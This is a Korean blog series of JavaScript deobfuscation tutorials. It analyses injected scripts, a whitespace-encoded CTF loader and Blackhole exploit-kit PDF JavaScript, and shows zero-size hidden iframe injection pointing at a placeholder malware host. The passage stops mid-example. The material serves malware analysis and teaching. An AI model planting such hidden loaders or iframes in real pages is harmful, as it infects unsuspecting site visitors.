검색결과 리스트
난독화에 해당되는 글 32건
- 2013.05.25 [9] 스크립트의 동작 흐름으로 풀어보는 난독화
- 2013.05.23 [8] Dehydrating a String (보이지 않는 코드)
- 2013.05.19 [7] 자바스크립트의 함수 이해하기
- 2013.05.17 [6] 난독화에 자주 등장하는 자바스크립트 함수 1
- 2013.05.13 [5] 블랙홀 툴킷의 PDF 난독화 풀이 2
- 2013.05.08 [4] 난독화 연습 문제풀이 따라하기 I 4
- 2013.05.04 [3] 자바스크립트 난독화 기초 2
- 2013.05.04 [2] 자바스크립트 난독화 Tool
- 2013.05.03 난독화 스터디 시작!!
- 2013.05.03 [1] 자바스크립트 난독화 기초 3
글
[9] 스크립트의 동작 흐름으로 풀어보는 난독화
[9] 스크립트의 동작 흐름으로 풀어보는 난독화
1. 위/변조 사이트 확인 중 의심스크립트 확인
[그림.1] 정상사이트에 삽입된 악성 스크립트
2. 의심스크립트 분리 화면
- 한 줄로 된 의심 스크립트를 분리하여 난독화된 스크립트를 확인
[그림 2] 악성스크립트 분리
3. 구조를 알기 쉽게 스크립트 정리
- 스크립트는 메인 함수와 그 안에 포함된 부분함수 2개의 구조로 이루어져 있다
[그림 3] 스크립트 정리 및 구조
4. 난독화 패턴 분석
1) 해당 스크립트는 분석하기 어렵게 하기 위해 다수의 쓰레기 값을 추가하였다
아래의 패턴 등 다양하게 사용되지 않는 변수를 삽입하여 실제 값을 찾기 어렵게 한다
|
var GW; if(GW!='d'){GW='d'}; ⇒ GW = d |
☞ 위의 값들은 스크립트에 전혀 영향을 미치지 않는다
2) 부분함수 1은 메인 함수와 부분함수 2의 특정변수를 계산해주는 함수로 사용된다
3) 메인 함수와 부분함수 2에서 HEX값 및 특정 로직의 데이터 값을 삽입하여 악성코드 유포 URL을
조합하게 되고 body.appendChild를 이용하여 body에 추가하여 실행하는 구조이다
▶ 해당 문서에서는 이러한 구조를 모르더라도 alert창을 통하여 흐름을 파악하고 key값을
유추하여 복호화 하는 방법을 익히는 것이 목표이다
5. 난독화된 스크립트 복호화 하기
1) 다수의 변수와 함수 등을 이용하여 난독화된 스크립트를 상세히 분석하는 것보다 실행을 위해
변수들이 합쳐지는 부분, 실제 스크립트 값가지고 있는 변수(이하 key값)를 찾아 보겠다
≫ key값을 찾기 어렵게 함수를 사용하여 난독화되어 한 번에 찾을 수 없었다
2) key값을 찾기 위해 ‘alert’을 이용하여 스크립트 동작 흐름을 알아 보았다
- 주요 부분(함수시작 등)에 “alert(숫자);”를 삽입
[그림 4] 순서 확인을 위한 alert 삽입
3) 실행 시 alert 창의 순서: 1 - 9 - 2 - 4 - 3 - 5 - 6 - 3 - 8
[그림 5] 경고창 순서 확인
4) ‘alert(8)’ 부분에서 스크립트가 종료되었기 때문에 ‘8’ 근처에서 key값이 실행된다고 판단하였다
- 8 부분 근처에서 key값이 될 만한 변수를 찾아보았다
[그림 6] 복호화 key값 확인
5) ‘alert(8)’ 부분에 ‘alert(G)’ 삽입 결과
[그림 7] 복호화된 악성 URL 확인
6) 스크립트 동작 순서가 ‘6 - 3 - 8’인데 6번에서 key 값을 찾는 이유! (궁금했다면 Good!!)
- ① 부분을 실행을 위해 ② 함수가 실행되고 다시 ①의 아래 부분이 실행
[그림 8] 스크립트 동작 순서 TIP
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [11] 난독화를 풀어라!!! (0) | 2013.12.07 |
|---|---|
| [10] Red Kit 의 재미있는 난독화 (2) | 2013.11.27 |
| [8] Dehydrating a String (보이지 않는 코드) (0) | 2013.05.23 |
| [7] 자바스크립트의 함수 이해하기 (0) | 2013.05.19 |
| [6] 난독화에 자주 등장하는 자바스크립트 함수 1 (0) | 2013.05.17 |
글
[8] Dehydrating a String (보이지 않는 코드)
[8] Dehydrating a String (보이지 않는 코드)
1. Dehydrating a String 이란?
Dehydrating a String은 공격코드를 탭과 스페이스로 난독화하여 소스코드에서 공백으로만 보이도록 작성된 코드입니다. 때문에 보이지 않는 코드 또는 공백코드라고 알려져 있습니다. .
[그림 1] Dehydrating a String (보이지 않는 코드)
1) 2008년 Blackhat 보안 컨퍼런스에서 최초 발표 (Hoffman)
2) 2011년 12월에 국내에서 악성코드 유포에 이용 탐지
2. Dehydrating a String 코드가 포함된 해킹문제 풀이 (2012 Codegate 문제)
분석에 이용된 샘플은 2012년 Codegate 해킹대회에 출제되었던 문제로 tra님이 제공해 주었다.
2.1 샘플 구성
- 메인 페이지와 하위폴더에 이미지 및 다수의 구성파일을 가지고 있는 구조로 되어있다.
[그림 2] codegate 문제 구성
- 메인 페이지 실행 시 화면
[그림 3] 메인 페이지 화면
2.2 소스코드 확인
2.2.1 메인 페이지 소스코드
[그림 4] 메인 페이지 소스코드
1) html 종료 후 비정상적으로 의심스러운 공백스크립트가 삽입된 것을 확인 할 수 있다.
2.2.2 codegate.js 소스 코드
[그림 5] codegate.js 소스코드
1) 메인 페이지에서 codegate.js를 불러오는 것이 확인된다.
2) codegate.js 소스 확인 시 의심스러운 스크립트를 확인 할 수 있다.
[그림 6] 의심스크립트 디코딩
1) 의심스러운 스크립트만 분리하여 eval을 alert으로 수정 후 실행하면 임의코드1이 확인된다
[그림 7] 임의코드1를 malzilla를 이용하여 보기좋게 정리
1) 임의코드1을 malzilla의 기능을 이용하여 정리해보면 함수의 형태를 가지고 있고, parseInt 및
String.fromCharCode로 보아 난독화 데이터를 복호화하는 역할이라고 추측할 수 있다.
2) [그림 7]처럼 eval을 alert으로 변환하여 실행해보면, 결과값이 나타나지 않는다. 복호화되는
데이터 부분이 없기 때문이다.
3) 다른 어딘가에 디코딩된 데이터가 있을 것이라고 판단되어, 관련 소스코드를 모두 확인결과
[그림 4]의 메인 페이지에 삽입된 공백스크립트가 가장 의심스러웠다
2.2.3 메인페이지 공백스크립트 + 임의코드1 분석
[그림 8] 임의코드1과 메인 페이지의 공백스크립트 결합
1) 임의코드1은 함수이고 공백스크립트는 함수를 실행하는 형태이므로, [그림 8]처럼 입력한다.
2) eval을 alert으로 수정 후 값을 확인 해보았다.
[그림 9] 공백스크립트 복호화 결과
1) 임의코드1에 의해 공백코드가 임의코드2로 복호화되는 것을 확인 할 수 있었다
[그림 10] 임의코드2에서 인증키 값 확인
1) 임의코드2에는 인증키 값을 표시하는 듯한 authkey 값을 확인 할 수 있었다.
2) [그림 10]처럼 alert을 이용하여 인증키 값을 확인해보자
[그림 11] 인증키 값 확인
3. Dehydrating a String 부분 상세 분석
“Dehydrating a String 분석1”에서 공백코드 부분을 상세분석 해보자.
3.1 임의코드1 정리
[그림 12] 임의코드1 상세분석
1) 임의코드1을 malzilla의 Format code기능으로 ②처럼 정리 후 어렵게 표시된 변수를 보기 쉽게
바꾸어 주면 ③과 같은 함수가 된다.
3.2 공백스크립트 분석
[그림 13] 공백의 hex값 확인
1) 메인페이지의 공백스크립트의 공백 부분을 malzilla로 HEX값을 확인하면 09와 20으로 이루어
진 것을 확인할 수 있다. (HEX값에서 09 = TAB, 20 = 스페이스바)
2) TAB과 스페이스로 이루어져 있기 때문에 마치 아무것도 없는 것 처럼 보였던 것 이다.
[그림 14] 스페이스바=1, TAB=0으로 변환
1) 스페이스바=1, TAB=0으로 변환하여 보면 0와 1로 이루어진 것을 확인 할 수 있다.
2) 임의코드1 함수에서는 공백코드를 2진수로 변환 후 다시 문자열로 변환한다
3.3 공백스크립트 상세분석
공백부분을 복호화하는 함수부분을 자세히 알아보고 연습해 보자!
※ 분석에 사용된 공백코드는 너무 길어, 실습은 수정한 공백코드를 사용하겠습니다.
|
<script> function c(s) { s=s.replace(/ /g,1); //-- 공백(스페이스바)는 1로 변환 s=s.replace(/\t/g,0); //-- TAB은 0으로 변경 ('\t' = TAB) var bb=s; s=""; for(i=0;i<bb.length;i++) { s=bb.substring(i,i+1)+s //-- 순서를 거꾸로 변경 (reverse와 동일한 효과) }; var cc=""; for(i=0;i<s.length;i+=9) { cc+=String.fromCharCode(parseInt(s.substring(i,i+9),2)) //-- 8개자씩 끈어서 2진수를 10진수변환 후 다시 문자열로 변환하여 cc에 저장 }; eval(cc); //-- cc를 실행 }
c(" "); //-- 함수실행 부분 (s에 공백코드 삽입) </script> |
1) 스페이스바와 TAB을 1과 0으로 변환한다.
2) substring을 사용하여 순서가 반대로 변환되도록 한다.
3) 8자리씩 잘라 2진수의 형태를 갖추게 하고, parseInt를 이용하여 10진수로 만든다.
4) String.fromCharCode를 이용하여 문자열로 변환하여 cc 변수에 저장하고 eval로 실행한다.
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [10] Red Kit 의 재미있는 난독화 (2) | 2013.11.27 |
|---|---|
| [9] 스크립트의 동작 흐름으로 풀어보는 난독화 (0) | 2013.05.25 |
| [7] 자바스크립트의 함수 이해하기 (0) | 2013.05.19 |
| [6] 난독화에 자주 등장하는 자바스크립트 함수 1 (0) | 2013.05.17 |
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
글
[7] 자바스크립트의 함수 이해하기
[7] 자바스크립트 함수 이해하기
1. 자바스크립트 함수
자바스크립트에서 함수는 난독화에서도 다양하게 이용되기 때문에 잘 이해해 두어야 한다.
자바스크립트에서 함수도 수학에 함수와 동일하다. X라는 입력 값을 넣었을 때 Z라는 출력 값이
나오도록 해주는 것을 말한다
아래의 그림을 참고하여 자바스크립트에서 함수를 표현 방법을 알아보자
[그림 1] 자바스크립트 함수
1) 그림에서 ①은 함수의 이름을 선언해 주는 것이다. 함수를 실행시킬 때 함수의 이름을 사용한다.
2) ②는 연산해주는 부분이다. 실제 동작 하게하는 스크립트가 들어가는 부분이다.
3) ③은 계산된 결과 값을 을 리턴 해주는 부분이다. ( x에 값이 들어오면 12를 더해 b를 리턴)
4) ④는 함수를 실행하는 부분으로, 7을 넣어 kwang( )로 정의된 함수를 실행시키라는 뜻이다.
5) 함수를 실행 후 b의 값을 출력해 보면 b=19라는 결과를 얻을 수 있다.
2. 예제를 통하여 함수 사용법 익히기
아래 예제를 통하여 연습하면서 함수와 친해져 보자!
2.1 기본구조 연습
|
<script> function kwang() //-- 함수이름 { a="kwangguevara"+".tistory.com"; //-- 스크립트 return a; //-- 출력 값 (스크립트 후 결과값) }; // alert(a) → 이 부분에서 a값을 alert해보면 정의되지 않아 오류 발생 kwang(); //-- 함수 실행 alert(a); //-- 함수가 실행 후 a 값 확인 </script> |
1) Kwang()가 실행되면 되면 a=”kwangguevara.tistory.com”가 되는 함수이다.
2) 함수 실행 전에는 a가 정의되지 않았지만, 실행 후에는 출력이 되는 것을 알 수 있다
2.2 함수 속 함수 구조
|
<script> function kwang() //-- 첫 번째 함수 { var a='kwang'+'guevara'; return a; };
function sam() //-- 두 번째 함수 { b=kwang() // 첫 번째 함수의 return 값을 b에 저장 var c=b+"moc.yrotsit.".split("").reverse().join(""); return alert(c); // 두 번째 함수의 출력 값 (alert을 이용하여 출력) }; sam(); // 두 번째 함수 실행 </script> |
1) Sam()함수 실행 시 kwang()함수가 실행되고 값이 b에 저장되어 변수 c를 구하는데 사용된다.
2) 위의 경우처럼 난독화에서도 함수를 미리 정의해 놓고 다른 함수에서 불러 쓰는 경우가 많다
2.3 난독화에서 함수 사용 예
- 아래와 같은 한 줄로 된 자바스크립트가 포함되어 있다. 동작원리를 알아보자
|
<script>function _(x,xx){var a=(x+xx).split("").reverse().join("");return a;};var t = open;function sam(s){I=_("moc.yrots","it.araveuggnawk");var c="http://"+I;s(c);};sam(t); </script> |
- Malzilla의 Decoder 탭에 있는 [format code] 기능을 이용하여 보기 좋게 정리하자.
|
<script> function _(x,xx) //ß ① 함수 { var a=(x+xx).split("").reverse().join(""); //-- x변수와 xx변수를 더해서 거꾸로 return a; }; var t = open; //-- t 변수 정의 function sam(s) //ß ② 함수 { I=_("moc.yrots","it.araveuggnawk"); //-- ① 함수를 실행하여 I 변수에 저장 var c="http://"+I; s(c); //-- sam(s) 함수의 출력값 }; sam(t); //-- sam()함수의 s부분에 t변수를 넣어 실행 </script> |
1) 스크립트를 실행하면 웹 브라우저가 실행되어 “http://kwangguevara.tistory.com/”으로 접속한다
2) I=_("moc.yrots","it.araveuggnawk"); 은 function _(x,xx)를 실행하여 I에 저장한다.
ð x 변수에 ”moc.yrots"를 xx변수에 "it.araveuggnawk" 값을 넣은 _(x,xx) 형태인 것을 알 수 있다
3) 실제 악성스크립트에서는 함수 명을 애매하게 만들어 알아보기 어렵게 하는 경우가 많다
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [9] 스크립트의 동작 흐름으로 풀어보는 난독화 (0) | 2013.05.25 |
|---|---|
| [8] Dehydrating a String (보이지 않는 코드) (0) | 2013.05.23 |
| [6] 난독화에 자주 등장하는 자바스크립트 함수 1 (0) | 2013.05.17 |
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
글
[6] 난독화에 자주 등장하는 자바스크립트 함수 1
[6] 난독화에 자주 등장하는 스크립트 함수 1
1. String.fromCharCode
String.fromCharCode는 아스키코드를 기준으로 숫자를 문자로 변환해주는 함수이다.
아래의 예제를 통하여 실습해 보면 쉽게 이해할 수 있을 것이다.
|
<script> // -- 기본 사용 예제 1 document.write(String.fromCharCode(65)); // -- 출력 1 document.write("<br>");document.write("<br>"); // -- 단지 결과값의 줄 바꾸기 역할만!!
// -- 기본 사용 예제 2 s=65 document.write( String.fromCharCode(s)); // -- 출력 2 document.write("<br>");document.write("<br>"); // -- 줄 바꾸기
// -- 문자열로 변환하는 예제 a="104,116,116,112,58,47,47,107,119,97,110,103,103,117,101,118,97,114,97,46,116,105,115,116,111, 114,121,46,99,111,109"; b=a.split(","); // -- a를 배열로 만드는 부분 c=""; for (i=0;i<b.length;i++) // -- i=0 부터 b의 길이 보다 작을 때 까지 1씩 증가 { c+=String.fromCharCode(b[i]); // -- 배열 b의 i번재 요소를 문자화해서 c 변수에 저장 } document.write(c); // -- 출력 3
</script> |
## 예제 스크립트 결과
ð A (출력 1)
ð A (출력 2)
ð http://kwangguevara.tistory.com (출력 3)
※ String.fromCharCode는 난독화된 데이터 복호화시 key 값을 문자열로 변환하여 저장하기 위해 많이 사용합니다. 때문에 key값이 저장된 변수를 찾는데 도움이 됩니다.
2. charCodeAt
String.fromCharCode의 반대라고 생각하면 된다. 문자를 숫자로 변환해주는 함수이다
≫ 기본형태: 변수(문자열).charCodeAt(자리수); -- 변수(문자열)의 (자리수)를 숫자로 변환
역시 아래의 예제를 통하여 실습해 봅시다!!
|
<script> // -- 기본 사용 예제 1 a="A"; document.write(a.charCodeAt(0)); // -- 출력 1 document.write("<br>");document.write("<br>"); // -- 줄 바꾸기
// -- 기본 사용 예제 2 b="ABC"; document.write(b.charCodeAt(0) + ", " +b.charCodeAt(1) + ", " + b.charCodeAt(2)); // -- 출력 2 document.write("<br>");document.write("<br>"); // -- 줄 바꾸기
// -- 문자열을 변환하는 예제 c="http://kwangguevara.tistory.com"; s=""; for (i=0;i<c.length;i++ ) { s+=c.charCodeAt(i)+", "; } document.write(s); // -- 출력 3 </script> |
## 예제 스크립트 결과
ð 65 (출력 1)
ð 65, 66, 67 (출력 2)
ð 104, 116, 116, 112, 58, 47, 47, 107, 119, 97, 110, 103, 103, 117, 101, 118, 97, 114, 97, 46, 116, 105, 115, 116, 111, 114, 121, 46, 99, 111, 109, (출력 3)
3. parseInt
String 인자 값에서 정수로 표현 가능한 부분을 10진수로 변환하여 나타내어 주는 함수이다.
≫ 기본형태: parseInt(string, 진수); -- string 진수를 10진수로 변환
* 진수 부분에는 2 ~ 36의 숫자만 들어갈 수 있다.
* 진수부분을 생략했을 때 string 부분이 0으로 시작하면 8진수로, \x로 시작하면 16진수로
처리된다.
|
<script> //parseInt(string, 진수) <---스트링(진수)을 10진수로 변환 a=parseInt(1010,2); document.write(a + "<br>"); // -- 출력 1 a=parseInt(1010,8); document.write(a + "<br>"); // -- 출력 2 a=parseInt(1010,16); document.write(a + "<br>"); // -- 출력 3 a=parseInt(1010,36); document.write(a + "<br>"); // -- 출력 4
// parseInt를 이용하여 Hex값을 10진수로 변환하기 b="68,74,74,70,3a,2f,2f,6b,77,61,6e,67,67,75,65,76,61,72,61,2e,74,69,73,74,6f,72,79,2e,63,6f,6d"; b=b.split(","); c=""; for (i=0;i<b.length;i++) { c+=parseInt(b[i],16)+", "; } document.write(c); // -- 출력 5 </script> |
## 예제 스크립트 결과
ð 10 (출력 1)
ð 520 (출력 2)
ð 4112 (출력 3)
ð 46692 (출력 4)
ð 104, 116, 116, 112, 58, 47, 47, 107, 119, 97, 110, 103, 103, 117, 101, 118, 97, 114, 97, 46, 116, 105, 115, 116, 111, 114, 121, 46, 99, 111, 109, (출력 5)
4. Hex값을 문자열로 변환하기
String.fromCharCode와 parseInt를 이용하여 hex값을 문자열로 변환하는 예제이다.
실제 악성스크립트에서 상당히 많이 사용되고 있으므로 확실히 익혀두기 바란다.
|
<script> // 응용하기 (16진수를 문자열로 변환하기) b="68,74,74,70,3a,2f,2f,6b,77,61,6e,67,67,75,65,76,61,72,61,2e,74,69,73,74,6f,72,79,2e,63,6f,6d"; b=b.split(","); c=""; for (i=0;i<b.length;i++) { c+=String.fromCharCode(parseInt(b[i],16)); // -- 16진수를 10진수로 변환 후 문자열로 변환 } document.write(c); // -- 출력 1 </script> |
## 예제 스크립트 결과
ð http://kwangguevara.tistory.com
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [8] Dehydrating a String (보이지 않는 코드) (0) | 2013.05.23 |
|---|---|
| [7] 자바스크립트의 함수 이해하기 (0) | 2013.05.19 |
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
글
[5] 블랙홀 툴킷의 PDF 난독화 풀이
[5] 블랙홀 툴킷의 PDF 난독화 풀이
1. Blackhole Exploit Toolkit 이란?
악성코드 유포에 이용되는 Web exploit Toolkit 중에서도 가장 많이 알려져 있고, 악성코드 유포에
이용되는 빈도수도 꾸준히 상위권을 유지하고 있다. 현재는 2.0버전이 이용되고 있으며, pdf, java 등 다양한 취약점을 이용한다.
2. Blackhole Toolkit의 난독화
블랙홀 툴킷을 분석하면 다양한 난독화 기법이 이용되는 것을 볼 수 있다. 그 중 에서도 메인페이지 부분과 pdf파일에 삽입된 자바스크립트 난독화 부분이 있는데, 특히 pdf 부분은 시간이 지날수록 조금씩 어렵게 바뀌고 있다.
3. PDF 파일에 삽입된 자바스크립트 난독화 분석.
2013년 5월 10일 확인된 blackhole toolkit의 샘플 중 pdf 난독화 부분을 확인해 보겠다.
3.1 분석을 위해 수집한 패킷 샘플에서 PDF 파일 추출
[그림 1] 샘플패킷에서 PDF파일 추출
3.2 악성 PDF 파일에서 자바스크립트 추출
[그림 2] PDF파일에서 자바스크립트 분리하기
1) 그림에서 ①의 Load 버튼을 클릭하여 저장한 PDF파일을 불러온다
2) 그림에서 ②부분에 표시된 Objects을 클릭하면 ③ 부분에 내용이 표시된다.
3) Objects를 하나씩 클릭하여 의심스러운 내용이 포함된 것을 찾는다
4) 아래그림 처럼 분리된 자바스크립트를 확인할 수 있다
[그림 3] 분리된 자바스크립트
3.3 악성 스크립트 분석
3.3.1 스크립트 구조
[그림 4] 악성 스크립트의 구조
1) 난독화된 데이터 부분 a는 ZA( )함수들로 이루어져 있는 배열이다.
2) 이것은 첫 번째 스크립트 부분의 마지막 줄에 있는 function ZA(a)에 의해 아스키코드로
변환된다.
3) 아스키코드로 변환된 것은 다시 두 번째 스크립트 부분에 의해 문자열로 변환되어 실행된다.
3.3.2 첫 번째 스크립트 부분 분석
|
if((this.getSaveItem+"")[0]=="f")if(ImageField1.ZZA(321,513613,"a")===0) {z=this;zz="y";x='eI';} // if조건이 만족할 때 {z=this;zz="y";x='eI';}인데, 여기서는 스크립트만 가져왔기 때문에 조건이 성립하지 않아 스크립트가 동작하지 않는다. 실행되도록 하기 위해 if 절을 주석 처리하겠다
dd="Code"; ddd="ar"; s="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@yiODshOxsTLbKSJljyjNibt3tb23t"; xx=s[2]+'al'; // 위의 4줄은 메인 부분을 보기 어렵게 하기 위해 쪼개놓은 코드라고 생각하면 된다. 메인 부분을 이 부분들을 보고 수정하면 원래 복호화 코드가 된다
function ZZA(){return 0;} // if 절을 만족시키기 위해 사용하는 코드
function ZA(a){return z["\x65"+xx]("\x70ar"+"s"+x+s[0]+s[1])(a,26);} // 메인 부분 1, 이 부분을 위의 내용들을 참고하여 수정하면 아래처럼 된다 ð function ZA(a){return this.eval(parseInt(a,26);} |
3.3.3 두 번째 스크립트 부분 분석
|
if((z.getSaveItem+"")[0]=="f")if(zz=="y")if(020===0x10) // 첫 번째 부분과 동일한 이유로 if절은 주석 처리한다
z["\x65"+xx](String["fromCh"["conca"+s[3]](ddd,dd)]["appl"["conca"+s[3]](zz)](String,a)); //메인 부분 2, 이 부분도 위의 내용들을 참고하여 수정하면 아래처럼 된다
ð this.eval(String.fromCharCode.apply(String,a)); |
3.3.4 복호화 데이터 출력
- 스크립트 분석한 것을 적용하면 아래와 같다
[그림 5] 간결화한 스크립트
1) 문자열로 확인하기 위해 스크립트가 실행되는 두 번째 eval을 alert으로 변경 후 실행한다
- alert으로 수정하여 실행하면 아래처럼 복호화된 데이터를 확인할 수 있다
[그림 6] 복호화 결과
1) 결과를 확인하면 Shallcode가 포함된 스크립트를 확인 할 수 있다
3.4 shallcode 추출 및 악성코드 유포 URL 확인
- 복호화 결과에서 우리가 필요한 shallcode 부분만 document.write를 이용하여 추출한다
[그림 6] 스크립트에서 Shallcode 부분 추출
1) 실제로 동작하는 Shallcode 부분만 추출하기 위해 나머지 부분은 주석처리 후 Shallcode가
저장되는 변수를 확인한다
- Malzilla Tool을 이용하여 최종 악성코드 유포지 확인
[그림 7] Mallzilla를 이용한 악성코드 유포지 확인
1) Shallcode를 분석하기 위해서는 일반적으로 해당부분을 파일로 만들어 ollydbg에서 분석한다.
하지만 여기서는 간단하게 malzilla를 이용하는 방법을 알아보았다.
2) 일반적으로 Shallcode를 malzilla로 확인 시 Xor 연산이 되어 바로 보이지 않는 경우가 많지만,
해당 샘플에서는 악성코드 유포지가 바로 확인되었다
[참고] Shallcode를 실행파일로 만들어주는 사이트: http://sandsprite.com/shellcode_2_exe.php
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [7] 자바스크립트의 함수 이해하기 (0) | 2013.05.19 |
|---|---|
| [6] 난독화에 자주 등장하는 자바스크립트 함수 1 (0) | 2013.05.17 |
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
글
[4] 난독화 연습 문제풀이 따라하기 I
[4] 난독화 연습 문제풀이 따라하기 I
1. 기본적인 난독화 풀이 방법을 통한 풀이
※ 해당 난독화 기법은 2012년도에 실제 악성코드 유포에 이용되었던 것으로, 설명에 이용하기 위해
악성URL 대신 블로그 주소를 넣어 샘플을 만들어 실습하였습니다.
1.1 위/변조된 사이트에서 악성 자바스크립트 확인
- 정상사이트지만 html 종료 후 비정상적으로 삽입된 의심 스크립트 확인
[그림 1] 의심스크립트 확인
1.2 의심스크립트만 분리 후 실행화면
- 의심스크립트 실행 시 특정 URL로 접속을 시도한다
☞ 실제 악성스크립트에서는 width=0, height=0으로 설정된 iframe이 삽입되어 아래처럼 연결화면이
나오지는 않았지만, 이해하기 쉽게 하기위해 특정 URL로 연결동작이 보이도록 변경하였다.
[그림 2] 스크립트 실행 시 특정URL 접속 확인
1.3 의심스크립트 분석
- alert을 이용한 문자열 확인
[그림 3] 의심스크립트 정리
① 의심 스크립트만 분리하여 저장 후 보기 좋게 나눈다
② A 부분이 document.write와 unescape를 통하여 어떤 동작하는 것으로 의심되기 때문에
document.write를 alert으로 변경하여 문자열로 확인시도 한다
- 실행 결과
[그림 4] A부분 결과 값
- A부분 결과 값를 [그림3]의 A부분에 삽입
[그림 5] A부분결과 값 삽입
- 결과 부분을 보기 좋게 정리
[그림 6] 스크립트 정리
① function 부분을 보기좋게 정리하면 document.write 부분이 의심스러워 보인다
② document.write를 alert으로 변경하여 결과값을 문자열로 확인시도 한다
- 실행 결과
[그림 7] 최종 결과 값 확인
1.4 의심스크립트 분석 결과
- 의심스크립트 분석결과, 특정사이트로 연결하는 iframe이 난독화된 스크립트로 확인
- 실제 악성코드에서는 width=0, height=0으로 설정되어 사용자가 인지하지 못한 상태에서
악성 URL로 연결을 시도 후 악성파일을 다운로드
강좌4_샘플.zip
* 해당 글에서 분석한 난독화 샘플이 필요하시면 댓글 달아 주시면 보내드리겠습니다.
→ 파일 첨부하였습니다. (받아가시고 댓글 부탁드려요 ^^)
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [6] 난독화에 자주 등장하는 자바스크립트 함수 1 (0) | 2013.05.17 |
|---|---|
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
| 난독화 스터디 시작!! (0) | 2013.05.03 |
글
[3] 자바스크립트 난독화 기초 2
[3] 자바스크립트 난독화 기초 2
1. Iframe Tag를 이용한 악성코드 유포
1.1 일반적인 악성코드 유포 패턴
예제 1)
| <iframe src=http://[악성코드 유포사이트 경로] width=0 height=0></iframe> |
① 정상적으로 서비스되고 있는 웹사이트를 해킹하여 소스코드에 iframe을 삽입
② 악성코드 유포사이트를 보이지 않게 하기위해 “width=0 height=0”로 설정
③ 이런 악성코드가 삽입된 사이트를 위/변조 사이트라고 하며, 이런 사이트 접속 시
사용자는 인지하지 못한 상태에서 악성코드에 감염
* iframe Tag는 정상사이트에서도 사용하기 때문에, 있다고 반드시 악성은 아니다
1.2 해커 입장에서 “예제1” 의 문제점
① 보안장비에서 패턴을 통하여 탐지 가능하다
② 보안담당자가 소스코드만 확인하여도 쉽게 악성코드 유포지를 알 수 있다
ð 때문에 난독화를 통하여 보안장비 우회 및 분석시간이 오래 걸리도록 한다
2. 같은 의미! 다른 형태!
2.1. 동일한 의미를 가진 여러 형태의 패턴
예제 2)
|
ex 1) <iframe src=http://café.naver.com width=800 height=500></iframe>
ex 2) <script> a="<iframe src";b="=http://caf";c="e.nav"; d="er.com width";e="=800 heigh"; f="t=500></iframe>"; document.write(a+b+c+d+e+f); </script>
|
① ex 1) 과 ex 2) 는 다른형태를 가지고 있지만, 동일한 행위를 한다
예제 3)
|
ex 1) a="%3Ciframe%20src%3Dhttp%3A//cafe.naver.com%20width%3D800%20height%3D500%3E %3C/iframe%3E"
b="3c696672616d65207372633d687474703a2f2f636166652e6e617665722e636f6d2077696474 683d383030206865696768743d3530303e3c2f696672616d653e";
c="60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,99,97,102,101,46,110, 97,118,101,114,46,99,111,109,32,119,105,100,116,104,61,56,48,48,32,104,101,105,103,104,116, 61,53,48,48,62,60,47,105,102,114,97,109,101,62";
d="PGlmcmFtZSBzcmM9aHR0cDovL2NhZmUubmF2ZXIuY29tIHdpZHRoPTgwMCBoZWlnaHQ9 NTAwPjwvaWZyYW1lPiA=";
|
① a, b, c, d는 모두 다른 형태이지만. 동일한 의미를 가지고 있다.
② 예제 3)의 형태는 기본적인 형태이므로 보면 어떤 코드인지 알 수 있도록 해야 한다
3. 난독화에 많이 이용되는 기본 패턴
3.1. escape와 unescape
예제 4)
|
<script> a="%3Ciframe%20src%3Dhttp%3A//cafe.naver.com%20width%3D800%20height%3D500%3E%3C/iframe%3E"; s=unescape(a); //-- a를 unescape로 변환하여 s에 저장 document.write(s); </script>
## 결과 cafe.naver.com 으로 접속 시도한다
|
① document.write는 문자열로 html에 반환하기 때문에 iframe이 실행된다
- 문자열을 보고 싶다면, alert 이나 xmp tag를 이용하면 된다
② a는 escape로 난독화되어 있기 때문에 unescape를 이용하여 복호화 하였다
3.2. HEX Code
b는 HEX Code이다. Hex는 기본적으로 알고 있을 것이다. 하지만 해당 코드가 hex인줄 몰랐다면
익숙하지는 않은 것이다.
예제 5)
|
<script> b="3c696672616d65207372633d687474703a2f2f636166652e6e617665722e636f6d207769647468 3d383030206865696768743d3530303e3c2f696672616d653e"; var s=""; for(i=0;i<b.length;i+=2) {s+=String.fromCharCode(parseInt(b.substring(i,i+2),16))}; document.write(s); </script> ## 결과 cafe.naver.com 으로 접속 시도한다 (예제 4번과 동일한 이유)
|
① 위와 같은 스크립트를 이용하여 복호화 할 수 있다
② 예제 4번과 동일한 방법으로 복호화된 문자열을 볼 수 있다
3.3. ASCII Code
c는 아스키코드이다. 숫자, 문자, 특수기호에 번호를 부여한 것이라 생각하면 된다
예제 6)
|
<script> c="60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,99,97,102,101,46,110,97, 118,101,114,46,99,111,109,32,119,105,100,116,104,61,56,48,48,32,104,101,105,103,104,116,61,53, 48,48,62,60,47,105,102,114,97,109,101,62"; s=""; c=c.split(",") for (i=0;i<c.length;i++){s+=String.fromCharCode(c[i]);} document.write(s); </script> ## 결과 cafe.naver.com 으로 접속 시도한다 (예제 4번과 동일한 이유)
|
① 위와 같은 스크립트를 이용하여 복호화 할 수 있다
② 예제 4번과 동일한 방법으로 복호화된 문자열을 볼 수 있다
3.4. Base64 Code
d는 Base64 Code이다. 전자메일에서 사용하는 64진수 코드라고 보면 된다.
예제 7)
|
